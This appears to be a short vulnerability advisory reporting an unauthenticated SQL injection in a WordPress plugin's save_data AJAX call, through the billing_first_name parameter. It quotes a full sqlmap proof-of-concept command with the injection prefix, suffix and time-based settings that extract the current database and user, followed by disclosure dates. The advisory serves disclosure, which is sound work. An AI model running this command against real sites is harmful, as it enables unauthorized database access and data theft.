The plugin is affected by an unauthenticated SQL injection via the billing_first_name parameter of the save_data AJAX call.
From the original researcher: ./sqlmap.py -u https://example.com/wp-admin/admin-ajax.php --cookie='[cookies content here]' --method='POST' --data='billing_first_name=attacker&billing_last_name=attacker&billing_company=attacker&billing_address_1=wpdeeply&billing_address_2=attacker&billing_city=attacker&billing_state=attacker&billing_postcode=123234&billing_country=GB&billing_phone=12324&billing_email=attacker%40attacker.com&order_notes=&wcal_guest_capture_nonce=[nonce-value]&action=save_data' -p billing_first_name --prefix="', '', '','', '',( TRUE " --suffix=")) -- attacker" --dbms mysql --technique=T --time-sec=1 --current-db --current-user
2020-11-08 (about 2 years ago)
2020-11-08 (about 2 years ago)
2020-11-09 (about 2 years ago)